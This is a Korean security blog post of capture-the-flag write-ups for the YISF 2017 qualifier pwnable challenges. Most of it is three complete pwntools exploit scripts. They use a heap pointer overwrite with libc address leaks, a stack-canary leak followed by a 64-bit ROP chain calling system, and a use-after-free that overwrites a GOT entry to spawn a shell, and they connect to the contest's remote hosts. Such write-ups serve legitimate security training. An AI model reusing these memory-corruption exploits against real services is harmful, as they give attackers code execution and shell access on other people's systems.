cdor1's lab
YISF 2017 Quals all pwnable 본문
50 - Just Integer overflow at selling and get flag
100 - Just buffer overflow and get flag
150 - Heap pointer overwrite
from pwn import *
#s = process('./item')
s = remote('112.166.114.143', 317)
def add(data):
print s.recvuntil('> ')
s.sendline('1')
print s.recvuntil('input content: ')
s.sendline(data)
def show():
print s.recvuntil('> ')
s.sendline('2')
def delete(idx):
print s.recvuntil('> ')
s.sendline('3')
print s.recvuntil('input index of item to be deleted: ')
s.sendline(str(idx))
def modify(idx, data):
print s.recvuntil('> ')
s.sendline('4')
print s.recvuntil('input index of item to modify: ')
s.sendline(str(idx))
print s.recvuntil('input content: ')
s.send(data)
add('aaaa')
add('bbbb')
delete(0)
add('a'*120 + p32(0x602018))
show()
print s.recvuntil('[1633771873] - ')
printf_leak = u64(s.recv(6).ljust(8, '\x00'))
base = printf_leak - 0x54340
system = base + 0x46590
oneshot = base + 0x46428
log.info('printf_leak : ' + hex(printf_leak))
log.info('base : ' + hex(base))
log.info('system : ' + hex(system))
log.info('oneshot : ' + hex(oneshot))
add('cccc')
add('dddd')
delete(2)
add('a'*120 + p32(0x602018))
show()
print s.recvuntil('[1633771873] - ')
print s.recvuntil('[1633771873] - ')
free_leak = u64(s.recv(6).ljust(8, '\x00'))
log.info('free_leak : ' + hex(free_leak))
modify(1, p64(oneshot))
s.interactive() 200 - Canary leak, 64bit rop
from pwn import *
#s = process('./pokemon_manager')
s = remote("112.166.114.145", 3137)
raw_input("$")
print s.recvuntil("name: ")
s.send("A"*0x38)
print s.recvuntil("age: ")
s.sendline("-1")
print s.recvuntil("> ")
s.sendline("1")
print s.recvuntil("name: ")
s.sendline("asdf")
print s.recvuntil("level: ")
s.sendline("10")
print s.recvuntil("comment: ")
s.sendline("asdf")
print s.recvuntil("> ")
s.sendline("4")
print s.recvuntil("name: ")
s.send("B"*0x40)
print s.recvuntil("level: ")
s.sendline("1")
print s.recvuntil("comment: ")
s.send("D"*0x11c + "QQQQQ")
print s.recvuntil("> ")
s.sendline("3")
print s.recvuntil("> ")
s.sendline("4")
print s.recvuntil("beam")
s.sendline("1")
sleep(2)
print s.recvuntil("> ")
s.sendline("2")
print s.recvuntil("QQQQQ")
recved = s.recv(7)
canary = u64("\x00" + recved)
print "canary: " + hex(canary)
s.sendline("4")
print s.recvuntil("name: ")
s.send("B"*0x40)
print s.recvuntil("level: ")
s.sendline("1")
print s.recvuntil("comment: ")
payload = "D"*0x120
payload += p64(canary)
payload += "A"*8
payload += p64(0x401f63) # pop rdi
payload += p64(4)
payload += p64(0x401f61) # pop rsi, pop r15
payload += p64(0x603060) # alarm
payload += p64(0x0)
payload += p64(0x4009a0) # write_plt
payload += p64(0x401f61) # pop rsi, pop r15
payload += p64(0x6030c8) # fork@got
payload += p64(0x0)
payload += p64(0x400a20) # read@plt
payload += p64(0x401f61) # pop rsi, pop r15
payload += p64(0x6030c8+8) # sleep@got
payload += p64(0x0)
payload += p64(0x400a20) # read@plt
payload += p64(0x401f63) # pop rdi
payload += p64(0x6030c8+8) # sleep@got
payload += p64(0x400ad0) # fork_plt
s.send(payload)
print s.recvuntil("> ")
s.sendline("5")
print s.recvuntil("quitting...\n")
recved = s.recv(6)
alarm_libc = u64(recved + "\x00\x00")
libc_base = alarm_libc - 0xcc200
system = libc_base + 0x45390
print "alarm: " + hex(alarm_libc)
s.sendline(p64(system))
s.sendline("cat flag>&4\x00")
s.interactive()
300 - Tricky UAF
from pwn import *
#s = remote('112.166.114.147', 31337)
s = process('/home/cdor1/rating')
def show():
print s.recvuntil('> ')
s.sendline('1')
def add(name, rating, comment):
print s.recvuntil('> ')
s.sendline('2')
print s.recvuntil('input name: ')
s.sendline(name)
print s.recvuntil('input rating: ')
s.sendline(str(rating))
print s.recvuntil('input comment of this row: ')
s.send(comment)
def insert(idx, name, rating, comment):
print s.recvuntil('> ')
s.sendline('3')
print s.recvuntil('input index of row that will follow: ')
s.sendline(str(idx))
print s.recvuntil('input name: ')
s.sendline(name)
print s.recvuntil('input rating: ')
s.sendline(str(rating))
print s.recvuntil('input comment of this row: ')
s.sendline(comment)
def delete(idx):
print s.recvuntil('> ')
s.sendline('4')
print s.recvuntil('input index of row to delete: ')
s.sendline(str(idx))
def modify(idx, name, rating, comment):
print s.recvuntil('> ')
s.sendline('5')
print s.recvuntil('input index of row to modify: ')
s.sendline(str(idx))
print s.recvuntil('input name: ')
s.sendline(name)
print s.recvuntil('input rating: ')
s.sendline(str(rating))
print s.recvuntil('input comment of this row: ')
s.sendline(comment)
add('a'*24, -1, '/bin/sh\x00')
add('b'*24, -1, 'c'*48)
modify(5, 'a'*24, 10, "A"*0x18 + "B"*7 + "\x00")
modify(5, 'a'*24, 10, "A"*0x18 + "B"*6 + "\x00")
modify(5, 'a'*24, 10, "A"*0x18 + "B"*5 + "\x00")
modify(5, 'a'*24, 10, "A"*0x18 + "B"*4 + "\x00")
modify(5, 'a'*24, 10, "A"*0x18 + "\x18\x20\x60" + "\x00")
delete(5)
s.sendline('5')
print s.recvuntil('aaaaaaaaaaaaaaaaaaaaaaaa')
leak = u64(s.recv(6).ljust(8, '\x00'))
base = leak - 3961670
system = base + 0x45390
log.info('leak : ' + hex(leak))
log.info('base : ' + hex(base))
print s.recvuntil('input index of row to modify: ')
s.sendline('6')
print s.recvuntil('input name: ')
s.sendline('a'*24)
print s.recvuntil('input rating: ')
s.sendline('-1')
print s.recvuntil('input comment of this row: ')
s.sendline(p64(system))
delete(4)
s.interactive()
'Security > Pwnable' 카테고리의 다른 글
| pwnable.tw spirited_away (0) | 2017.08.11 |
|---|---|
| pwnable.tw dubblesort (0) | 2017.08.10 |
| pwnable.tw applestore (0) | 2017.08.01 |
| pwnable.tw seethefile (0) | 2017.07.21 |
| IDEA (0) | 2017.06.08 |
Comments